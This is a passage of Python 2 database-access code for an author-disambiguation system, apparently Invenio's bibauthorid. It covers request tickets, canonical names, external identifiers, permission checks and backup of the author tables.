    '''
    tag = 'extid:%s' % ext_sys
    if ext_id is None:
        _delete_from_aidpersoniddata_where(pid=pid, tag=tag)
    else:
        _delete_from_aidpersoniddata_where(pid=pid, tag=tag, data=ext_id)
def update_request_ticket_for_author(pid, ticket_dict, tid=None):  # update_request_ticket
    '''
    Creates/updates a request ticket for the given author with the specified
    ticket 'image'.

    @param pid: author identifier
    @type pid: int
    @param ticket_dict: ticket 'image', a tag -> value mapping
    @type ticket_dict: dict {str: object}
    @param tid: ticket identifier; when None a new ticket is created
    @type tid: int
    '''
    request_tickets = get_request_tickets_for_author(pid)
    request_tickets_exist = bool(request_tickets)
    if tid is None:
        # Create: allocate the next free ticket id for this author.
        existing_tids = [0]
        for request_ticket in request_tickets:
            existing_tids.append(request_ticket['tid'])
        tid = max(existing_tids) + 1
        new_request_ticket = {'tid': tid}
        for tag, value in ticket_dict.iteritems():
            new_request_ticket[tag] = value
        request_tickets.append(new_request_ticket)
    else:
        # Update: overlay the given tags on the matching ticket.
        for request_ticket in request_tickets:
            if request_ticket['tid'] == tid:
                for tag, value in ticket_dict.iteritems():
                    request_ticket[tag] = value
                break
    # Drop tickets carrying no operations; iterate over a copy because the
    # list is mutated while looping.
    for request_ticket in list(request_tickets):
        if 'operations' not in request_ticket or not request_ticket['operations']:
            request_tickets.remove(request_ticket)
    request_tickets_num = len(request_tickets)
    request_tickets = serialize(request_tickets)
    # The whole ticket list lives in one serialized row: delete the old
    # row (if any) and re-insert; opt1 caches the ticket count.
    if request_tickets_exist:
        remove_request_ticket_for_author(pid)
    run_sql("""insert into aidPERSONIDDATA
               (personid, tag, datablob, opt1)
               values (%s, %s, %s, %s)""",
            (pid, 'request_tickets', request_tickets, request_tickets_num))
def remove_rtid_from_ticket(rtid, pid):
    '''
    Remove rtid from ticket blob in aidPERSONIDDATA.

    @param rtid: RT ticket identifier to strip from the stored tickets
    @type rtid: int
    @param pid: author identifier
    @type pid: int
    '''
    request_tickets = get_request_tickets_for_author(pid)
    request_tickets_exist = bool(request_tickets)
    # Strip the rtid from the first ticket carrying it; the ticket itself
    # is kept.
    for request_ticket in request_tickets:
        if 'rtid' in request_ticket and request_ticket['rtid'] == rtid:
            request_ticket.pop('rtid')
            break
    request_tickets_num = len(request_tickets)
    request_tickets = serialize(request_tickets)
    # Rewrite the whole serialized blob (delete + insert), as elsewhere.
    if request_tickets_exist:
        remove_request_ticket_for_author(pid)
    run_sql("""insert into aidPERSONIDDATA
               (personid, tag, datablob, opt1)
               values (%s, %s, %s, %s)""",
            (pid, 'request_tickets', request_tickets, request_tickets_num))
def remove_request_ticket_for_author(pid, tid=None):  # delete_request_ticket
    '''
    Removes a request ticket from the given author. If ticket identifier is not
    specified it removes all the pending tickets for the given author.

    @param pid: author identifier
    @type pid: int
    @param tid: ticket identifier
    @type tid: int
    '''
    def remove_all_request_tickets_for_author(pid):
        # All tickets live in one serialized row; one delete clears them.
        run_sql("""delete from aidPERSONIDDATA
                   where personid=%s
                   and tag=%s""",
                (pid, 'request_tickets'))
    if tid is None:
        remove_all_request_tickets_for_author(pid)
        return
    request_tickets = get_request_tickets_for_author(pid)
    if not request_tickets:
        return
    # Drop the single matching ticket from the deserialized list.
    for request_ticket in list(request_tickets):
        if request_ticket['tid'] == tid:
            request_tickets.remove(request_ticket)
            break
    # Replace the stored blob: delete, then re-insert the survivors
    # (nothing to re-insert if the last ticket was removed).
    remove_all_request_tickets_for_author(pid)
    if not request_tickets:
        return
    request_tickets_num = len(request_tickets)
    request_tickets = serialize(request_tickets)
    run_sql("""insert into aidPERSONIDDATA
               (personid, tag, datablob, opt1)
               values (%s, %s, %s, %s)""",
            (pid, 'request_tickets', request_tickets, request_tickets_num))
def modify_canonical_name_of_authors(pids_newcnames=None):  # change_personID_canonical_names
    '''
    Updates the existing canonical name of the given authors.

    @param pids_newcnames: author - new canonical name pairs [(personid, new_canonical_name),]
    @type pids_newcnames: list [(int, str),]
    '''
    # Guard: the declared default (None) previously crashed in
    # enumerate(None); treat a missing/empty worklist as a no-op.
    if not pids_newcnames:
        logger.update_status_final("Changing canonical names finished.")
        return
    for idx, (pid, newcname) in enumerate(pids_newcnames):
        logger.update_status(float(idx) / float(len(pids_newcnames)), "Changing canonical names...")
        # delete the existing canonical name of the current author and the
        # current holder of the new canonical name
        run_sql("""delete from aidPERSONIDDATA
                   where tag=%s
                   and (personid=%s or data=%s)""",
                ('canonical_name', pid, newcname))
        run_sql("""insert into aidPERSONIDDATA
                   (personid, tag, data)
                   values (%s, %s, %s)""",
                (pid, 'canonical_name', newcname))
    logger.update_status_final("Changing canonical names finished.")
def _delete_from_aidpersoniddata_where(pid=None, tag=None, data=None, opt1=None, opt2=None, opt3=None):
    '''
    Deletes the records from aidPERSONIDDATA matching the given attributes.
    When no attribute at all is given the call is a no-op (an unrestricted
    delete is refused).

    @param pid: author identifier
    @type pid: int
    @param tag: data tag
    @type tag: str
    @param data: data tag value
    @type data: str
    @param opt1: opt1
    @type opt1: int
    @param opt2: opt2
    @type opt2: int
    @param opt3: opt3
    @type opt3: str
    '''
    # (sql condition, bound value) pairs; only supplied values take part in
    # the where-clause.  The tag keeps its historical str() normalisation.
    filters = (('personid=%s', pid),
               ('tag=%s', None if tag is None else str(tag)),
               ('data=%s', data),
               ('opt1=%s', opt1),
               ('opt2=%s', opt2),
               ('opt3=%s', opt3))

    conditions = []
    args = []
    for condition, value in filters:
        if value is not None:
            conditions.append(condition)
            args.append(value)

    if not conditions:
        return

    query = ('delete from aidPERSONIDDATA '
             'where %s') % " and ".join(conditions)
    run_sql(query, tuple(args))
# ********** getters **********#
def get_all_author_data_of_author(pid):
    '''
    Gets the (personid, tag) pairs of all data rows stored for the author.

    @param pid: author identifier
    @type pid: int
    @return: records ((personid, tag),)
    @rtype: tuple ((int, str),)
    '''
    return _select_from_aidpersoniddata_where(select=['personid', 'tag'], pid=pid)
def get_author_data(pid, tag):  # get_personid_row
    '''
    Gets all the records associated to the specified author and tag.

    @param pid: author identifier
    @type pid: int
    @param tag: data tag
    @type tag: str
    @return: records ((data, opt1, opt2, opt3, tag),)
    @rtype: tuple ((str, int, int, str, str),)
    '''
    return _select_from_aidpersoniddata_where(select=['data', 'opt1', 'opt2', 'opt3', 'tag'], pid=pid, tag=tag)
def get_canonical_name_of_author(pid):  # get_canonical_id_from_personid - get_canonical_names_by_pid
    '''
    Gets the canonical name of the given author (empty tuple when the
    author has none).

    @param pid: author identifier
    @type pid: int
    @return: canonical name
    @rtype: tuple ((str),)
    '''
    return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
def get_pid_to_canonical_name_map():
    """
    Builds a dictionary mapping every author identifier that has a
    canonical name to that name.

    @return: personid -> canonical name
    @rtype: dict {int: str}
    """
    rows = run_sql("select personid, data from aidPERSONIDDATA where tag='canonical_name'")
    return dict((pid, cname) for pid, cname in rows)
def get_uid_of_author(pid):  # get_uid_from_personid
    '''
    Gets the user identifier associated with the specified author, or None
    when the author is not connected to any user.

    @param pid: author identifier
    @type pid: int
    @return: user identifier
    @rtype: str
    '''
    rows = _select_from_aidpersoniddata_where(select=['data'], tag='uid', pid=pid)
    if not rows:
        return None
    return rows[0][0]
def get_external_ids_of_author(pid):  # get_personiID_external_ids
    '''
    Gets a mapping which associates an external system (e.g. Inspire) with
    the identifiers that the given author carries in that system.

    @param pid: author identifier
    @type pid: int
    @return: mapping {ext_system: [ext_id,]}
    @rtype: dict {str: [str,]}
    '''
    rows = run_sql("""select tag, data
                      from aidPERSONIDDATA
                      where personid=%s
                      and tag like %s""",
                   (pid, 'extid:%%'))
    ext_ids = defaultdict(list)
    for tag, external_id in rows:
        # Tags are of the form 'extid:<SYSTEM>'.
        system = tag.split(':')[1]
        ext_ids[system].append(external_id)
    return ext_ids
def get_internal_user_id_of_author(pid):
    """
    Gets user id (current and eventual old ones) associated to an author.

    @param pid: author identifier
    @type pid: int
    @return: (current uid or None, list of old uids)
    @rtype: tuple (int, list)
    """
    old_ids = run_sql("select data from aidPERSONIDDATA where tag like 'uid_old' and personid=%s", (pid,))
    # NOTE(review): relies on get_user_id_of_author() returning raw rows
    # (((uid,),)) -- not visible in this chunk; confirm it is not meant to
    # be get_uid_of_author(), which returns a scalar.
    ids = get_user_id_of_author(pid)
    try:
        ids = int(ids[0][0])
    except IndexError:
        ids = None
    try:
        old_ids = [x[0] for x in old_ids]
    except IndexError:
        old_ids = list()
    return ids, old_ids
def get_arxiv_papers_of_author(pid):
    '''
    Gets the arxiv papers of the specified author, or None when no list has
    been stored for him.

    @param pid: author identifier
    @type pid: int
    @return: arxiv paper identifiers
    @rtype: list [str,]
    '''
    rows = run_sql("""select datablob
                      from aidPERSONIDDATA
                      where tag=%s
                      and personid=%s""",
                   ('arxiv_papers', pid))
    if not rows:
        return None
    return deserialize(rows[0][0])
def get_request_tickets_for_author(pid, tid=None):  # get_request_ticket
    '''
    Gets the request tickets for the given author. If ticket identifier is
    specified it returns only that one.

    @param pid: author identifier
    @type pid: int
    @param tid: ticket identifier
    @type tid: int
    @returns: request tickets, each a dict carrying at least a 'tid' key
    @rtype: list [dict,]
    '''
    try:
        request_tickets = run_sql("""select datablob
                                     from aidPERSONIDDATA
                                     where personid=%s
                                     and tag=%s""",
                                  (pid, 'request_tickets'))
        # Indexing an empty result raises IndexError, which doubles as the
        # "no stored tickets" branch below.
        request_tickets = list(deserialize(request_tickets[0][0]))
    except IndexError:
        return list()
    if tid is None:
        return request_tickets
    for request_ticket in request_tickets:
        if request_ticket['tid'] == tid:
            return [request_ticket]
    return list()
def get_authors_by_canonical_name_regexp(cname_regexp):  # get_personids_by_canonical_name
    '''
    Gets authors whose canonical name matches the SQL 'like' pattern.

    @param cname_regexp: SQL 'like' pattern (e.g. 'J.Smith%')
    @type cname_regexp: str
    @return: author identifiers and their canonical name ((pid, canonical_name),)
    @rtype: tuple ((int, str),)
    '''
    return run_sql("""select personid, data
                      from aidPERSONIDDATA
                      where tag=%s
                      and data like %s""",
                   ('canonical_name', cname_regexp))
def get_author_by_canonical_name(cname):  # get_person_id_from_canonical_id
    '''
    Gets the author who carries the given canonical name (empty tuple when
    no author does).

    @param cname: canonical name
    @type cname: str
    @return: author identifier ((pid),)
    @rtype: tuple ((int),)
    '''
    return _select_from_aidpersoniddata_where(select=['personid'], tag='canonical_name', data=cname)
def get_author_by_uid(uid):  # get_personid_from_uid
    '''
    Gets the author associated with the specified user identifier, or None
    when no author holds it.

    @param uid: user identifier
    @type uid: int
    @return: author identifier
    @rtype: int
    '''
    rows = _select_from_aidpersoniddata_where(select=['personid'], tag='uid', data=str(uid))
    if rows:
        return int(rows[0][0])
    return None
def get_author_by_external_id(ext_id, ext_sys=None):  # get_person_with_extid
    '''
    Gets the authors who carry the given external identifier. If 'ext_sys' is
    specified, it constraints the search only for that external system.

    @param ext_id: external identifier
    @type ext_id: str
    @param ext_sys: external system
    @type ext_sys: str
    @return: author identifiers as single-element rows set((pid,),)
    @rtype: set set((int,),)
    '''
    # NOTE(review): the rows are never unpacked, so the returned set holds
    # 1-tuples rather than bare ints -- callers must index [0]; confirm
    # this is the intended contract.
    if ext_sys is None:
        pids = _select_from_aidpersoniddata_where(select=['personid'], data=ext_id)
    else:
        tag = 'extid:%s' % ext_sys
        pids = _select_from_aidpersoniddata_where(select=['personid'], data=ext_id, tag=tag)
    return set(pids)
def get_authors_with_open_tickets():  # get_persons_with_open_tickets_list
    '''
    Gets all the authors who have open tickets.

    opt1 holds the ticket count cached at write time (see
    update_request_ticket_for_author).

    @return: author identifiers and count of tickets ((personid, ticket_count),)
    @rtype: tuple ((int, int),)
    '''
    return run_sql("""select personid, opt1
                      from aidPERSONIDDATA
                      where tag=%s""",
                   ('request_tickets',))
def get_author_data_associations(table_name="`aidPERSONIDDATA`"):  # get_full_personid_data
    '''
    Gets all author-data associations (from aidPERSONIDDATA table or any other
    table with the same structure).

    @param table_name: name of the table with the author-data associations;
        interpolated directly into the SQL, so it must come from trusted
        code, never from user input
    @type table_name: str
    @return: author-data associations ((pid, tag, data, opt1, opt2, opt3),)
    @rtype: tuple ((int, str, str, int, int, str),)
    '''
    return run_sql('select personid, tag, data, opt1, opt2, opt3 '
                   'from %s' % table_name)
def get_inspire_id_of_author(pid):  ### get_inspire_ids_by_pids
    '''
    Gets the external identifier of Inspire system for the given author.

    Note the mixed return types: the bare identifier string when exactly
    one is stored, an empty tuple when none is.

    @param pid: author identifier
    @type pid: int
    @return: Inspire external identifier, or () when absent
    @rtype: str or tuple
    @raise MultipleIdsOnSingleAuthorException: when more than one INSPIREID
        row exists for the author
    '''
    result = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='extid:INSPIREID')
    if result:
        if len(result) > 1:
            # Imported lazily to avoid a module-level dependency cycle.
            from invenio.bibauthorid_hoover_exceptions import MultipleIdsOnSingleAuthorException
            raise MultipleIdsOnSingleAuthorException('Conflict in aidPERSONIDDATA', pid, 'INSPIREID', result)
        return result[0][0]
    return tuple()
def get_orcid_id_of_author(pid):  # get_orcids_by_pids
    '''
    Gets the external identifier(s) of ORCID system for the given author.

    @param pid: author identifier
    @type pid: int
    @return: ORCID external identifier rows
    @rtype: tuple ((str),)
    '''
    return _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='extid:ORCID')
def create_new_author_by_uid(uid=-1, uid_is_owner=False):  # create_new_person
    '''
    Creates a new author and associates him with the given user identifier. If
    the 'uid_is_owner' flag is enabled the author will hold the user identifier
    as owner, otherwise as creator.

    @param uid: user identifier
    @type uid: int
    @param uid_is_owner: the author will hold the user identifier as owner, otherwise as creator
    @type uid_is_owner: bool
    @return: author identifier
    @rtype: int
    '''
    # If an author already owns this uid, reuse him instead of creating a
    # duplicate (only when ownership is requested).
    pid_with_uid = _select_from_aidpersoniddata_where(select=['personid'], tag='uid', data=uid)
    if pid_with_uid and uid_is_owner:
        return pid_with_uid[0][0]

    pid = get_free_author_id()
    if uid_is_owner:
        add_author_data(pid, 'uid', str(uid))
    else:
        add_author_data(pid, 'user-created', str(uid))
    return pid
def user_can_modify_data_of_author(uid, pid):  # user_can_modify_data
    '''
    Examines if the specified user can modify data of the given author.

    @param uid: user identifier
    @type uid: int
    @param pid: author identifier
    @type pid: int
    @return: user can modify data
    @rtype: bool
    '''
    # Editing one's own author profile needs a weaker privilege than
    # editing somebody else's.
    uid_of_author = _select_from_aidpersoniddata_where(select=['data'], tag='uid', pid=pid)
    rights = bconfig.CLAIMPAPER_CHANGE_OTHERS_DATA
    if uid_of_author and str(uid) == str(uid_of_author[0][0]):
        rights = bconfig.CLAIMPAPER_CHANGE_OWN_DATA
    # acc_authorize_action returns 0 as first element on success.
    return acc_authorize_action(uid, rights)[0] == 0
def _select_from_aidpersoniddata_where(select=None, pid=None, tag=None, data=None, opt1=None, opt2=None, opt3=None):
    '''
    Selects the given fields from the records of aidPERSONIDDATA table
    with the specified attributes. If no parameters are given it returns all
    records.

    @param select: fields to select
    @type select: list [str,]
    @param pid: author identifier
    @type pid: int
    @param tag: data tag
    @type tag: str
    @param data: data tag value
    @type data: str
    @param opt1: opt1
    @type opt1: int
    @param opt2: opt2
    @type opt2: int
    @param opt3: opt3
    @type opt3: str
    @return: given fields of the records with the specified attributes
    @rtype: tuple
    '''
    if not select:
        return None
    conditions = list()
    add_condition = conditions.append
    args = list()
    add_arg = args.append
    # Seed with 'True' so the where-clause stays valid with no filters.
    add_condition('True')
    if pid is not None:
        add_condition('personid=%s')
        add_arg(pid)
    if tag is not None:
        add_condition('tag=%s')
        add_arg(tag)
    if data is not None:
        add_condition('data=%s')
        add_arg(data)
    if opt1 is not None:
        add_condition('opt1=%s')
        add_arg(opt1)
    if opt2 is not None:
        add_condition('opt2=%s')
        add_arg(opt2)
    if opt3 is not None:
        add_condition('opt3=%s')
        add_arg(opt3)
    select_fields_str = ", ".join(select)
    conditions_str = " and ".join(conditions)
    query = """select %s
               from aidPERSONIDDATA
               where %s""" % (select_fields_str, conditions_str)
    return run_sql(query, tuple(args))
#
#
# both tables ###
#
#
# ********** setters **********#
def empty_authors_exist(printer, repair=False):  # check_empty_personids
    '''
    Examines if there are empty authors (that is authors with no papers or
    other defined data) and deletes them if specified.

    @param printer: for log keeping
    @type printer: func
    @param repair: delete empty authors
    @type repair: bool
    @return: empty authors are found
    @rtype: bool
    '''
    empty_pids = remove_empty_authors(remove=repair)
    if not empty_pids:
        return False
    for pid in empty_pids:
        printer("Personid %d has no papers and nothing else than canonical_name." % pid)
        if repair:
            printer("Deleting empty person %s." % pid)
    return True
def remove_empty_authors(remove=True):  # delete_empty_persons
    '''
    Gets all empty authors (that is authors with no papers or other defined
    data) and by default deletes all data associated with them, except if
    specified differently.

    @param remove: delete empty authors
    @type remove: bool
    @return: empty author identifiers set(pid,)
    @rtype: set set(int,)
    '''
    pids = run_sql("select distinct(personid) from aidPERSONIDPAPERS")
    pids_with_papers = set(pid[0] for pid in pids)
    pids_tags = _select_from_aidpersoniddata_where(select=['personid', 'tag'])
    pids_with_data = set(pid for pid, tag in pids_tags)
    #if a pid has another tag besides canonical name
    not_empty_pids = set(pid for pid, tag in pids_tags if tag not in bconfig.NON_EMPTY_PERSON_TAGS)
    # Empty = has data rows but neither papers nor any meaningful tag.
    empty_pids = pids_with_data - (pids_with_papers | not_empty_pids)
    if empty_pids and remove:
        run_sql("""delete from aidPERSONIDDATA
                   where personid in %s"""
                % _get_sqlstr_from_set(empty_pids))
    return empty_pids
# bibauthorid_maintenance personid update private methods
def update_canonical_names_of_authors(pids=None, overwrite=False, suggested='', overwrite_not_claimed_only=False):  # update_personID_canonical_names
    '''
    Updates the canonical names for the given authors. If no authors are
    specified it does the updating for all authors. If 'overwrite' flag is
    enabled it updates even authors who carry a canonical name. If
    'overwrite_not_claimed_only' flag is enabled it updates only authors who do
    not have any claim.

    @param pids: author identifiers
    @type pids: list
    @param overwrite: update even authors who carry a canonical name
    @type overwrite: bool
    @param suggested: suggested canonical name
    @type suggested: str
    @param overwrite_not_claimed_only: update authors who do not have any claim
    @type overwrite_not_claimed_only: bool
    '''
    if pids is None:
        pids = set([pid[0] for pid in _select_from_aidpersonidpapers_where(select=['personid'])])
    else:
        # Normalise: callers pass plain lists (e.g. get_data_of_papers),
        # and the set subtraction below requires a set.
        pids = set(pids)
    if not overwrite:
        pids_with_cname = set([x[0]
                              for x in _select_from_aidpersoniddata_where(select=['personid'], tag='canonical_name')])
        pids = pids - pids_with_cname
    for i, pid in enumerate(pids):
        logger.update_status(float(i) / float(len(pids)), "Updating canonical_names...")
        if overwrite_not_claimed_only:
            has_claims = bool(_select_from_aidpersonidpapers_where(select=['*'], pid=pid, flag=2))
            if has_claims:
                continue
        current_cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
        if overwrite or not current_cname:
            if current_cname:
                _delete_from_aidpersoniddata_where(pid=pid, tag='canonical_name')
            names_count = get_names_count_of_author(pid)
            names_count = sorted(names_count, key=itemgetter(1), reverse=True)
            if not names_count and not suggested:
                continue
            canonical_name = suggested
            if not suggested:
                # Derive the canonical name from the author's most frequent name.
                canonical_name = create_canonical_name(names_count[0][0])
            taken_cnames = run_sql("""select data from aidPERSONIDDATA
                                      where tag=%s
                                      and data like %s""",
                                   ('canonical_name', canonical_name + '%'))
            taken_cnames = set([cname[0].lower() for cname in taken_cnames])
            # Find the first free '.N' suffix.  The counter must NOT reuse
            # 'i': the original shadowed the enumerate() index here, which
            # corrupted the progress fraction for subsequent authors.
            for ordinal in count(1):
                current_try = canonical_name + '.' + str(ordinal)
                if current_try.lower() not in taken_cnames:
                    canonical_name = current_try
                    break
            run_sql("""insert into aidPERSONIDDATA
                       (personid, tag, data)
                       values (%s, %s, %s)""",
                    (pid, 'canonical_name', canonical_name))
    logger.update_status_final("Updating canonical_names finished.")
# ********** getters **********#
def get_free_author_ids():  # get_free_pids
    '''
    Gets unused author identifiers (it fills the holes).

    @return: free author identifiers
    @rtype: iterator (int, )
    '''
    # Union of pids from both tables; anything not in it is free.
    all_pids = frozenset(pid[0] for pid in chain(
        _select_from_aidpersonidpapers_where(select=['personid']),
        _select_from_aidpersoniddata_where(select=['personid'])))
    # Lazy: counts upward from 1, skipping taken ids.
    return ifilter(lambda x: x not in all_pids, count(1))
def get_free_author_id():  # get_new_personid
    '''
    Gets a free author identifier (one greater than the largest pid found
    in either table, or 1 when both tables are empty).

    @return: free author identifier
    @rtype: int
    '''
    candidates = []
    for rows in (_select_from_aidpersonidpapers_where(select=['max(personid)']),
                 _select_from_aidpersoniddata_where(select=['max(personid)'])):
        if rows and rows[0][0]:
            candidates.append(int(rows[0][0]))

    if candidates:
        return max(candidates) + 1
    return 1
def get_existing_authors(with_papers_only=False):  # get_existing_personids
    '''
    Gets existing authors (that is authors who are associated with a paper or
    withhold some other data). If 'with_papers_only' flag is enabled it gets
    only authors with papers.

    @param with_papers_only: only authors with papers
    @type with_papers_only: bool
    @return: author identifiers set(pid,)
    @rtype: set set(int,)
    '''
    pids_wih_data = set()
    if not with_papers_only:
        # zip(*rows)[0] raises IndexError on an empty result set; that is
        # the "no rows" branch.
        try:
            pids_wih_data = set(map(int, zip(*run_sql("select distinct personid from aidPERSONIDDATA"))[0]))
        except IndexError:
            pids_wih_data = set()
    try:
        pids_with_papers = set(map(int, zip(*run_sql("select distinct personid from aidPERSONIDPAPERS"))[0]))
    except IndexError:
        pids_with_papers = set()
    return pids_wih_data | pids_with_papers
def get_data_of_papers(recs, with_alt_names=False, with_all_author_papers=False):  # get_persons_from_recids
    '''
    Gets data for the specified papers. Helper for search engine indexing.
    For example: get_data_of_papers([1], True, True) returns
    ({1: [16591L]},
    {16591L: {'alternative_names': ['Wong, Yung Chow'],
    'canonical_id': 'Y.C.Wong.1',
    'person_records': [275304, 1, 51394, 128250, 311629]}})

    @param recs: paper identifiers
    @type recs: list
    @param with_alt_names: include alternative author names
    @type with_alt_names: bool
    @param with_all_author_papers: include all papers for each author
    @type with_all_author_papers: bool
    @return: data of the specified papers
    @rtype: tuple ({int: [int,]}, {int: {'str': str,}})
    '''
    paper_authors = dict()
    author_papers = dict()
    all_pids = set()
    # First pass: collect the authors of each requested paper
    # (flag > -2 excludes rejected attributions).
    for rec in recs:
        pids = run_sql("""select personid
                          from aidPERSONIDPAPERS
                          where bibrec=%s
                          and flag > -2""",
                       (rec,))
        pids = set(pid[0] for pid in pids)
        paper_authors[rec] = list(pids)
        all_pids |= pids
    # Second pass: gather per-author data for every author seen above.
    for pid in all_pids:
        pid_data = dict()
        cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
        # We can suppose that this author didn't have a chance to get a canonical name yet
        # because it was not fully processed by it's creator. Anyway it's safer to try to
        # create one before failing miserably.
        if not cname:
            update_canonical_names_of_authors([pid])
            cname = _select_from_aidpersoniddata_where(select=['data'], pid=pid, tag='canonical_name')
        # assert len(canonical) == 1
        # This condition cannot hold in case claims or update daemons are run in parallel
        # with this, as it can happen that an author with papers exists and whose
        # canonical name has not been computed yet. Hence, it will be indexed next time,
        # so that it learns. Each author should have at most one canonical name, so:
        assert len(cname) <= 1, "A person cannot have more than one canonical name"
        if len(cname) == 1:
            pid_data = {'canonical_id': cname[0][0]}
        if with_alt_names:
            names = run_sql("""select name
                               from aidPERSONIDPAPERS
                               where personid=%s
                               and flag > -2""",
                            (pid,))
            names = set(name[0] for name in names)
            pid_data['alternative_names'] = list(names)
        if with_all_author_papers:
            # NOTE(review): 'recs' shadows the parameter here; harmless
            # because the first loop over the parameter has completed.
            recs = run_sql("""select bibrec
                              from aidPERSONIDPAPERS
                              where personid=%s
                              and flag > -2""",
                           (pid,))
            recs = set(rec[0] for rec in recs)
            pid_data['person_records'] = list(recs)
        author_papers[pid] = pid_data
    return (paper_authors, author_papers)
def impaired_canonical_names_exist(printer, repair=False):  # check_canonical_names
    '''
    It examines if there are authors who carry less or more than one canonical
    name and repairs them if specified.

    @param printer: for log keeping
    @type printer: func
    @param repair: fix authors with less/more than one canonical name
    @type repair: bool
    @return: authors with less/more than one canonical name exist
    @rtype: bool
    '''
    impaired_canonical_names_found = False

    # Count the canonical-name rows per author (groupby needs the
    # pre-sort on the same key).
    authors_cnames = _select_from_aidpersoniddata_where(select=['personid', 'data'], tag='canonical_name')
    authors_cnames = sorted(authors_cnames, key=itemgetter(0))
    author_cnames_count = dict((pid, len(list(cnames))) for pid, cnames in groupby(authors_cnames, key=itemgetter(0)))

    to_update = list()
    for pid in get_existing_authors():
        cnames_count = author_cnames_count.get(pid, 0)
        if cnames_count != 1:
            if cnames_count == 0:
                # Missing canonical name only matters if the author has papers.
                papers_count = _select_from_aidpersonidpapers_where(select=['count(*)'], pid=pid)[0][0]
                if papers_count != 0:
                    impaired_canonical_names_found = True
                    printer("Personid %d does not have a canonical name, but has %d papers." % (pid, papers_count))
                    to_update.append(pid)
            else:
                impaired_canonical_names_found = True
                # BUGFIX: the tuple was previously passed as a second
                # positional argument to printer instead of %-formatting.
                printer("Personid %d has %d canonical names." % (pid, cnames_count))
                to_update.append(pid)

    if repair and impaired_canonical_names_found:
        printer("Repairing canonical names for pids: %s" % str(to_update))
        update_canonical_names_of_authors(to_update, overwrite=True)

    return impaired_canonical_names_found
def user_can_modify_paper(uid, sig_str):
    '''
    Examines if the given user can modify the specified paper attribution. If
    the paper is assigned more then one time (from algorithms) consider the
    most privileged assignment.

    @param uid: user identifier
    @type: int
    @param sig_str: signature in a string form e.g. '100:7531,9024'
    @type sig_str: str
    @return: user can modify paper attribution
    @rtype: bool
    '''
    table, ref, rec = _split_signature_string(sig_str)
    # Pick the attribution with the highest claim level (lcul) for this
    # signature.
    pid_lcul = run_sql("""select personid, lcul
                          from aidPERSONIDPAPERS
                          where bibref_table like %s
                          and bibref_value=%s
                          and bibrec=%s
                          order by lcul
                          desc limit 0,1""",
                       (table, ref, rec))
    # Unclaimed paper: either own-claim or others-claim right suffices.
    if not pid_lcul:
        return ((acc_authorize_action(uid, bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS)[0] == 0) or
                (acc_authorize_action(uid, bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS)[0] == 0))

    min_req_acc_n = int(pid_lcul[0][1])
    uid_of_author = run_sql("""select data
                               from aidPERSONIDDATA
                               where tag=%s
                               and personid=%s""",
                            ('uid', str(pid_lcul[0][0])))
    req_acc = get_paper_access_right(bconfig.CLAIMPAPER_CLAIM_OWN_PAPERS)
    if uid_of_author:
        # Modifying somebody else's claimed paper needs the stronger right.
        if (str(uid_of_author[0][0]) != str(uid)) and min_req_acc_n > 0:
            req_acc = get_paper_access_right(bconfig.CLAIMPAPER_CLAIM_OTHERS_PAPERS)
    if min_req_acc_n < req_acc:
        min_req_acc_n = req_acc
    min_req_acc = get_paper_access_right(min_req_acc_n)
    # NOTE(review): min_req_acc is passed through get_paper_access_right a
    # second time in the comparison below -- confirm the function is its
    # own inverse for these values, otherwise this re-mapping looks odd.
    return (acc_authorize_action(uid, min_req_acc)[0] == 0) and (get_paper_access_right(min_req_acc) >= min_req_acc_n)
#
#
# aidPERSONIDDATA or/and aidPERSONIDPAPERS table + some other table ###
#
#
# ********** setters **********#
def back_up_author_paper_associations():  # copy_personids
    '''
    Copies/Backs-up the author-data and author-paper association tables
    (aidPERSONIDDATA, aidPERSONIDPAPERS) to the back-up tables
    (aidPERSONIDDATA_copy, aidPERSONIDPAPERS_copy) for later
    comparison/restoration.
    '''
    # Recreate the back-up tables from scratch so they mirror the live
    # schema exactly before the bulk copy.
    run_sql('drop table if exists `aidPERSONIDDATA_copy`')
    run_sql("""CREATE TABLE `aidPERSONIDDATA_copy` (
              `personid` BIGINT( 16 ) UNSIGNED NOT NULL ,
              `tag` VARCHAR( 64 ) NOT NULL ,
              `data` VARCHAR( 256 ) NULL DEFAULT NULL ,
              `datablob` LONGBLOB NULL DEFAULT NULL ,
              `opt1` MEDIUMINT( 8 ) NULL DEFAULT NULL ,
              `opt2` MEDIUMINT( 8 ) NULL DEFAULT NULL ,
              `opt3` VARCHAR( 256 ) NULL DEFAULT NULL ,
              `last_updated` TIMESTAMP ON UPDATE CURRENT_TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ,
              INDEX `personid-b` (`personid`) ,
              INDEX `tag-b` (`tag`) ,
              INDEX `data-b` (`data`) ,
              INDEX `opt1` (`opt1`) ,
              INDEX `timestamp-b` ( `last_updated` )
              ) ENGINE = MYISAM DEFAULT CHARSET = utf8""")
    run_sql("""insert into `aidPERSONIDDATA_copy`
               select *
               from `aidPERSONIDDATA`""")
    run_sql('drop table if exists `aidPERSONIDPAPERS_copy`')
    run_sql("""CREATE TABLE IF NOT EXISTS `aidPERSONIDPAPERS_copy` (
              `personid` BIGINT( 16 ) UNSIGNED NOT NULL ,
              `bibref_table` ENUM(  '100',  '700' ) NOT NULL ,
              `bibref_value` MEDIUMINT( 8 ) UNSIGNED NOT NULL ,
              `bibrec` MEDIUMINT( 8 ) UNSIGNED NOT NULL ,
              `name` VARCHAR( 256 ) NOT NULL ,
              `m_name` VARCHAR( 256 ) NOT NULL ,
              `flag` SMALLINT( 2 ) NOT NULL DEFAULT  '0' ,
              `lcul` SMALLINT( 2 ) NOT NULL DEFAULT  '0' ,
              `last_updated` TIMESTAMP ON UPDATE CURRENT_TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP ,
              INDEX `personid-b` (`personid`) ,
              INDEX `reftable-b` (`bibref_table`) ,
              INDEX `refvalue-b` (`bibref_value`) ,
              INDEX `rec-b` (`bibrec`) ,
              INDEX `name-b` (`name`) ,
              INDEX `pn-b` (`personid`, `name`) ,
              INDEX `timestamp-b` (`last_updated`) ,
